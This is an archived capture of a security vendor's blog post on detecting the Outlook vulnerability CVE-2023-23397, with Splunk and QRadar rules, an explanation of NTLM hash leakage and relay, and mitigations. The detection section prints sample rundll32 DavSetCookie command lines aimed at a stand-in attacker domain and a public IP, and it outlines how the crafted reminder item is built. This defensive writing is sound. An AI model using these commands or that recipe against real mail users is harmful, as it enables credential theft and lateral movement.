www.cardinalops.com
Open in
urlscan Pro
2606:2c40::c73c:671e
Public Scan
Submitted URL: https://cthjm04.na1.hubspotlinks.com/Ctc/GE+113/cThJm04/VXbv1Z8Q37j_W5zYxD91zjDbrW6tdK5Q4Yn1-ZMDyKlX5knJmV3Zsc37CgHF9W911mln1gkW_wW3S...
Effective URL: https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar?utm_medi...
Submission: On March 20 via manual from US — Scanned from DE
Effective URL: https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar?utm_medi...
Submission: On March 20 via manual from US — Scanned from DE
Form analysis 1 forms found in the DOM
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7289101/e932d4e4-8e73-4e43-9aee-45272120bf6c
<form id="hsForm_e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7289101/e932d4e4-8e73-4e43-9aee-45272120bf6c"
class="hs-form-private hsForm_e932d4e4-8e73-4e43-9aee-45272120bf6c hs-form-e932d4e4-8e73-4e43-9aee-45272120bf6c hs-form-e932d4e4-8e73-4e43-9aee-45272120bf6c_59863ae6-1999-4c44-9fbe-c0d2857fa29a hs-form stacked"
target="target_iframe_e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" data-instance-id="59863ae6-1999-4c44-9fbe-c0d2857fa29a" data-form-id="e932d4e4-8e73-4e43-9aee-45272120bf6c" data-portal-id="7289101" data-hs-cf-bound="true">
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your First Name"
for="firstname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>First Name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="firstname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your Last Name"
for="lastname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>Last Name</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="lastname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" name="lastname" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
</div>
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your Email"
for="email-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_website hs-website hs-fieldtype-text field hs-form-field"><label id="label-website-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your Website"
for="website-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>Website</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="website-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" name="website" placeholder="" type="text" class="hs-input" inputmode="url" value=""></div>
</div>
<div class="hs_comment hs-comment hs-fieldtype-textarea field hs-form-field"><label id="label-comment-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your Comment"
for="comment-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>Comment</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><textarea id="comment-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="hs-input hs-fieldtype-textarea" name="comment" required="" placeholder=""></textarea></div>
</div>
<div>
<div class="hs-richtext hs-main-font-element">
<p><span style="color: #000000;">View our <a href="http://www-cardinalops-com.sandbox.hs-sites.com/privacy-policy" rel="noopener" target="_blank" style="color: #000000;">privacy policy</a>. By clicking submit you consent to allow CardinalOps to
store and process the personal information submitted to provide you the content requested.</span></p>
</div>
</div>
<div class="hs_recaptcha hs-recaptcha field hs-form-field">
<div class="input">
<div class="grecaptcha-badge" data-style="inline" style="width: 256px; height: 60px; box-shadow: gray 0px 0px 5px;">
<div class="grecaptcha-logo"><iframe title="reCAPTCHA"
src="https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6Ld_ad8ZAAAAAAqr0ePo1dUfAi0m4KPkCMQYwPPm&co=aHR0cHM6Ly93d3cuY2FyZGluYWxvcHMuY29tOjQ0Mw..&hl=en&v=Trd6gj1dhC_fx0ma_AWHc1me&size=invisible&badge=inline&cb=21331iv07zkm"
width="256" height="60" role="presentation" name="a-q0mi4bk7aj4n" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"
data-lf-form-tracking-inspected-yegkb8lpvym8ep3z="true" data-lf-yt-playback-inspected-yegkb8lpvym8ep3z="true" data-lf-vimeo-playback-inspected-yegkb8lpvym8ep3z="true"></iframe></div>
<div class="grecaptcha-error"></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response"
style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
</div><iframe style="display: none;" data-lf-form-tracking-inspected-yegkb8lpvym8ep3z="true" data-lf-yt-playback-inspected-yegkb8lpvym8ep3z="true" data-lf-vimeo-playback-inspected-yegkb8lpvym8ep3z="true"></iframe>
</div><input type="hidden" name="g-recaptcha-response" id="hs-recaptcha-response" value="">
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary" value="Submit Comment"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1679350614052","formDefinitionUpdatedAt":"1675875271676","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.64 Safari/537.36","pageTitle":"Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM QRadar","pageUrl":"https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar?utm_medium=email&_hsmi=251000918&_hsenc=p2ANqtz--x0szw68AfHFSQ0QILN-_8byNJLWet_ySKj5Fef9MaAYw1GP2RZIC3GwCZe-tQywj8LogBiSnbHoaUEDeccvPJyv9Mn1IFY_jB1daWPnIQ_TBelI8&utm_content=251000918&utm_source=hs_email","pageId":"107207374881","urlParams":{"utm_medium":"email","_hsmi":"251000918","_hsenc":"p2ANqtz--x0szw68AfHFSQ0QILN-_8byNJLWet_ySKj5Fef9MaAYw1GP2RZIC3GwCZe-tQywj8LogBiSnbHoaUEDeccvPJyv9Mn1IFY_jB1daWPnIQ_TBelI8","utm_content":"251000918","utm_source":"hs_email"},"isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar","contentType":"blog-post","hutk":"1165914497de9ed72a87c531dd60f182","__hsfp":1413633234,"__hssc":"190491124.1.1679350614751","__hstc":"190491124.1165914497de9ed72a87c531dd60f182.1679350614751.1679350614751.1679350614751.1","formTarget":"#hs_form_target_e932d4e4-8e73-4e43-9aee-45272120bf6c","formInstanceId":"8482","pageName":"Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM QRadar","locale":"en","timestamp":1679350614758,"originalEmbedContext":{"portalId":"7289101","formId":"e932d4e4-8e73-4e43-9aee-45272120bf6c","region":"na1","target":"#hs_form_target_e932d4e4-8e73-4e43-9aee-45272120bf6c","isBuilder":false,"isTestPage":false,"formInstanceId":"8482","formsBaseUrl":"/_hcms/forms","css":"","submitButtonClass":"hs-button primary","isMobileResponsive":true,"pageName":"Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM QRadar","pageId":"107207374881","contentType":"blog-post","isCMSModuleEmbed":true,"type":"BLOG_COMMENT"},"correlationId":"59863ae6-1999-4c44-9fbe-c0d2857fa29a","renderedFieldsIds":["firstname","lastname","email","website","comment"],"captchaStatus":"LOADED","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.2802","sourceName":"forms-embed","sourceVersion":"1.2802","sourceVersionMajor":"1","sourceVersionMinor":"2802","_debug_allPageIds":{"embedContextPageId":"107207374881","analyticsPageId":"107207374881","pageContextPageId":"107207374881"},"_debug_embedLogLines":[{"clientTimestamp":1679350614119,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1679350614119,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM QRadar\",\"pageUrl\":\"https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar?utm_medium=email&_hsmi=251000918&_hsenc=p2ANqtz--x0szw68AfHFSQ0QILN-_8byNJLWet_ySKj5Fef9MaAYw1GP2RZIC3GwCZe-tQywj8LogBiSnbHoaUEDeccvPJyv9Mn1IFY_jB1daWPnIQ_TBelI8&utm_content=251000918&utm_source=hs_email\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.64 Safari/537.36\",\"urlParams\":{\"utm_medium\":\"email\",\"_hsmi\":\"251000918\",\"_hsenc\":\"p2ANqtz--x0szw68AfHFSQ0QILN-_8byNJLWet_ySKj5Fef9MaAYw1GP2RZIC3GwCZe-tQywj8LogBiSnbHoaUEDeccvPJyv9Mn1IFY_jB1daWPnIQ_TBelI8\",\"utm_content\":\"251000918\",\"utm_source\":\"hs_email\"},\"pageId\":\"107207374881\",\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1679350614122,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1679350614755,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"1165914497de9ed72a87c531dd60f182\",\"canonicalUrl\":\"https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar\",\"contentType\":\"blog-post\",\"pageId\":\"107207374881\"}"}]}"><iframe
name="target_iframe_e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" data-lf-form-tracking-inspected-yegkb8lpvym8ep3z="true" data-lf-yt-playback-inspected-yegkb8lpvym8ep3z="true" data-lf-vimeo-playback-inspected-yegkb8lpvym8ep3z="true"
style="display: none;"></iframe>
</form>Text Content
×
This website stores cookies on your computer. These cookies are used to collect
information about how you interact with our website and allow us to remember
you. We use this information in order to improve and customize your browsing
experience and for analytics and metrics about our visitors both on this website
and other media. To find out more about the cookies we use, see our Privacy
Policy
If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.
Accept Decline
* Home
* Platform
* Resources
* CardinalOps in the News
* White Papers
* Webinars & Events
* Blog
* Free ATT&CK Assessment
* Company
* About Us
* Careers
* Request A Demo
DETECTING MICROSOFT OUTLOOK VULNERABILITY CVE-2023-23397 IN SPLUNK AND IBM
QRADAR
Posted by Tamir Oren Bar-Hai and Phil Neray on March 20, 2023
SUMMARY
Discovered by the Ukrainian CERT and attributed to APT28 (aka Fancy Bear or
Strontium, the Russian GRU threat actor), CVE-2023-23397 is being actively
exploited in targeted attacks against government, transportation, energy, and
military sectors in Europe.
With a CVSS rating of 9.8 – due to its elevation of privileges and ease of
exploitation – it affects all versions of Outlook for Windows and is
particularly serious because it steals credentials before the user has even
opened a specially-crafted email.
Attackers can then use the stolen credential to move laterally within the
network in order to gather more information and compromise crown-jewel assets.
It's also interesting that this attack is a variation of pass-the-hash (PtH)
which has been around since the late 90s.
This blog post includes detection rules for Splunk and IBM QRadar, as well as a
detailed technical description of the vulnerability and how it can be exploited.
If you’re currently using the CardinalOps detection posture management platform,
these rules are now being delivered to your portals.
As usual, the rules delivered to CardinalOps users are auto-customized to your
environment (indexes, naming conventions, etc.). This enables you to quickly
review, automatically test, and push them to your SIEM – via its native API –
from the CardinalOps platform.
This blog post describes:
* Relevant MITRE techniques for CVE-2023-23397
* Splunk and IBM QRadar detections for CVE-2023-23397
* How CVE-2023-23397 works
* Technical details for CVE-2023-23397
* How to detect CVE-2023-23397
* Other mitigations for CVE-2023-23397
RELEVANT MITRE TECHNIQUES FOR CVE-2023-23397
Exploitation for Privilege Escalation (T1068)
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)
Forced Authentication (T1187)
Exploitation for Credential Access (T1212)
Post-Exploitation
OS Credential Dumping: LSASS Memory (T1003.001)
Use Alternate Authentication Material (T1550)
DETECTIONS FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)
These rules will alert when a rundll32.exe uses webdav to access a public IP
address and in the same time range that an NTLM authentication outbound event is
registered with the same public IP address as the destination machine.
SPLUNK DETECTION RULES FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)
index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688
New_Process_Name = *rundll32.exe* Process_Command_Line = *davclnt.dll* | rex
field=Process_Command_Line "DavSetCookie \s*(?<IP_Address>\d+\.\d+\.\d+\.\d+)"
| search (IP_Address!="10.0.0.0/8" AND IP_Address!="192.168.0.0/16" AND
IP_Address!="172.16.0.0/12")
index={your_index} sourcetype={your_NTLM_audit_sourcetype} EventCode=8001| rex
field=target_server “\s*(?<IP_Address>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})” |
search (IP_Address!=“10.0.0.0/8" AND IP_Address!=“192.168.0.0/16” AND
IP_Address!=“172.16.0.0/12")
SPLUNK CORRELATION SEARCH FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)
search (index={your_index} sourcetype={your_NTLM_audit_sourcetype}
EventCode=8001| rex field=target_server
"\s*(?<IP_Address_1>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
| search (IP_Address_1!="10.0.0.0/8" AND IP_Address_1!="192.168.0.0/16" AND
IP_Address_1!="172.16.0.0/12")) OR (index={your_index}
sourcetype={your_4688_sourcetype} EventCode=4688 New_Process_Name =
*rundll32.exe* Process_Command_Line = *davclnt.dll* | rex
field=Process_Command_Line "DavSetCookie
\s*(?<IP_Address_2>\d+\.\d+\.\d+\.\d+)"
| search (IP_Address_2!="10.0.0.0/8" AND IP_Address_2!="192.168.0.0/16" AND
IP_Address_2!="172.16.0.0/12"))
| fillnull IP_Address_1 IP_Address_2 | eval
IP=case('IP_Address_1'!="0",'IP_Address_1, 'IP_Address_2'!="0",'IP_Address_2)
| stats dc(EventCode) as EventCode_count count by IP | where EventCode_count >
1
Note: Time range can be set using the Splunk search console.
IBM QRADAR DETECTION RULE FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)
and when the event(s) were detected by one or more of Microsoft Windows Security
Event Log
and when the event matches EventID (custom) is any of 4688
and when the event matches ProcessName (custom) is any of rundll32.exe
and when the event matches Process CommandLine (custom) contains any of
davclnt.dll
and when the event matches Process CommandLine (custom) matches any of
expressions ((?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(?:\.(?!$)|$)){4}
HOW CVE-2023-23397 WORKS
On March 14th, 2023, A serious vulnerability affecting Microsoft Outlook was
patched by Microsoft.
This vulnerability has existed in multiple versions for more than a decade. The
affected versions are Outlook for Windows 2013 up to 2019 including the
Microsoft 365 (Office 365) versions. Older versions could also be vulnerable but
are not tested or supported.
TL;DR – Adversary sending an email with the affected properties will trigger an
SMB outbound connection, causing your machine to send out your NTLM hash (your
encrypted password along with your username in clear text).
Not to be confused with NT-HASH which is the one used in Pass-the–Hash (PtH)
attacks. This NTLM hash contains an encrypted form of your password and will
require the adversary to bruteforce this encrypted credential before gaining
access to your clear text password.
The time for the bruteforce attack to succeed is dependent on your password
length and complexity (can range from seconds to years).
Of course there are other methods that can speed up the guessing process (e.g.,
Hashcat permutations) so we need to act quickly to prevent and detect this
vulnerability exploitation attempts.
Another approach to exploit this vulnerability is to relay the NTLM packets to a
target server or workstation.
Think of the IT admin using an unpatched Outlook version causing their machine
to send out an NTLM packet. This packet will be captured by the adversary and
relayed to another machine on the network, say the HR or Finance department head
(or someone in DevOps). Now those machines have accepted the IT admin
credentials to login into their machine. Any command can then be executed by the
adversary, on behalf of the IT admin.
Getting Creds via NTLMv2 | 0xdf hacks stuff
Of course, for this to occur the adversary needs to have established a foothold
on your network, unless you allow outbound and inbound SMB traffic from the
internet (we never allow that, right?).
To summarize, we have two outcomes from the exploitation of this Outlook
vulnerability: A possible password compromise and access to remote machines.
TECHNICAL DETAILS FOR CVE-2023-23397
Let's dive into more details:
* The Outlook client automatically parses and executes crafted messages
containing attributes controlling the MAPI properties allowing to set
“reminder notification” sound file location.
* The execution is performed silently, without any indication to the end user.
* The crafted messages can be a shared Outlook task or a calendar invite type
of a message.
* The specific MAPI properties are PidLidReminderFileParameter and
PidLidReminderOverride.
* Once these properties are set and the PidLidReminderFileParameter is pointing
to an adversary’s controlled machine - this is the culprit and that is the
reason we are reading this article 🙂.
The processing of the path to the reminder sound file location is mostly
triggered by Exchange based systems (on-prem and cloud).
Even Hotmail seems to do the same - Will Dormann on Twitter: "So, all of this
wondering about how to send a "rich" calendar invite over SMTP is moot. The
actual exploit for CVE-2023-23397 is an IPM.Task item with 0x851F
(PidLidReminderFileParameter) set. This is just fine as a TNEF attachment over
SMTP. https://t.co/yGSiR4B6wh https://t.co/7GIvb6zGlA" / Twitter
Once the Outlook client is able to process the malformed mail item, the outbound
SMB packet is sent, without any notification or user interaction.
It seems that even after applying the patch, Microsoft allows the reminder sound
file to be loaded by pointing to a hostname. This can be leveraged internally on
the network or can be used to access the public IP, if the hosts file is
manipulated. Will Dormann on Twitter: "So, all of this wondering about how to
send a "rich" calendar invite over SMTP is moot. The actual exploit for
CVE-2023-23397 is an IPM.Task item with 0x851F (PidLidReminderFileParameter)
set. This is just fine as a TNEF attachment over SMTP. https://t.co/yGSiR4B6wh
https://t.co/7GIvb6zGlA" / Twitter
Another nice “feature” of this vulnerability is the ability to trigger legacy
capabilities in Windows that if not managed, can leak credentials. For example,
by using a non-existent host name in the reminder file path, the adversary can
cause LLMNR and NBT-NS broadcast and multicast requests. See
https://attack.mitre.org/techniques/T1557/001/ for details.
HOW TO DETECT CVE-2023-23397
The process command line on the victim’s machine can be identified by the
following format:
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie [ip address or a
domain name] http://[ip address or a domain name]/[path to the a file or a
directory]
For example:
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 35.180.139.74
http://35.180.139.74/file/sound.wav
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie badguy
http://badguy_domain.com/file/sound.wav
The format can also be found to be shorter:
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie
http://35.180.139.74/file/sound.wav
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie
http://badguy_domain.com/file/sound.wav
Even though the command line is stating http protocol - the Windows machine will
send an SMB packet on port 445.
We need to detect when a DavSetCookie function is accessing a public IP address.
This can be normal for a home PC but might be questionable for an enterprise
machine. This detection can point out public IP addresses your enterprise
clients are using and are trustworthy but anything other than the known good
should trigger a deeper investigation.
If we are on the topic of identifying DLL functions we should also remember to
have detections to identify the use of a DLL function using the function’s
ordinal value. In this case (not tested but typically works), the command could
potentially be:
rundll32 c:\windows\system32\davclnt.dll,#6 35.180.139.74
http://35.180.139.74/share
For more details, see:
https://research.splunk.com/endpoint/6c135f8d-5e60-454e-80b7-c56eed739833/
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md#atomic-test-11---rundll32-with-ordinal-value
yara-rulz/Outlook_CVE_2023_23397.yara at main · elceef/yara-rulz (github.com)
Another powerful detection source can be leveraged by enabling “Outbound NTLM
traffic to remote servers” in the security options. This enables the audit of
outbound NTLM authentication traffic so you can identify where your desktops and
servers are sending their NTLM hashes.
Example event log:
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-DUR-001_pic2.png
https://www.windows-security.org/c526612a90004088b250158bc5e7dc2d/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote
OTHER MITIGATIONS FOR CVE-2023-23397
Microsoft suggests to block outbound port 445 and make use of the Protected
Users Active Directory group. This is good advice except “Protected Users” is
usually not a good fit for the standard user. Test wisely.
We suggest also reviewing your security posture to make sure other vectors are
not making it easy for the adversary.
1. Ensure your machines are configured to send out only NTLM-v2 and not one of
the weaker options. Specifically: configure “Send NTLMv2 responses only.
Refuse LM & NTLM.” For more information see
https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
2. The fact that we can trigger any outlook user to send his NTLM hash to any
destination can affect home users (think the C-level or IT admins) – even if
the adversary cracks the NTLM – the adversary still needs to get lucky and
find an interface without MFA. So make sure your home users use MFA for any
interface they use from their home PC!
3. To mitigate the NTLM relay attack vector: ensure SMB server signing is
enabled on workstations and servers. Configure workstations to block inbound
SMB(port 445) and enable exceptions to specific machines allowed to access
workstation over the network using port 445.
Topics: News, Featured, Threat Management, Security Engineering, MITRE ATT&CK,
SecOps, Detection Posture Management
First Name*
Last Name
Email*
Website
Comment*
View our privacy policy. By clicking submit you consent to allow CardinalOps to
store and process the personal information submitted to provide you the content
requested.
WHAT’S NEW
RECENT POSTS
* Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM
QRadar
* CardinalOps CEO Discusses the State of Today's SOC Teams on Silo Busting
Podcast
* State of Identity Podcast Episode 320: Detection Posture Management
* CardinalOps Named as Winner in 2023 Cybersecurity Excellence Awards for
Detection Posture Management
* How Detection Posture Management Can Help CISOs Track the Right Metrics
FEATURED
* Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM
QRadar
* CardinalOps CEO Discusses the State of Today's SOC Teams on Silo Busting
Podcast
* State of Identity Podcast Episode 320: Detection Posture Management
* CardinalOps Named as Winner in 2023 Cybersecurity Excellence Awards for
Detection Posture Management
* How Detection Posture Management Can Help CISOs Track the Right Metrics
POSTS BY TAG
* SecOps
* Threat Management
* Featured
* Security Engineering
* MITRE ATT&CK
* News
* venture capital
* Cloud
* Detection Posture Management
POSTS BY TAG
* SecOps (24)
* Threat Management (23)
* Featured (20)
* Security Engineering (19)
* MITRE ATT&CK (18)
* News (13)
* venture capital (3)
* Cloud (2)
* Detection Posture Management (2)
See all
*
© 2023 CardinalOps | Privacy Policy | Terms of Use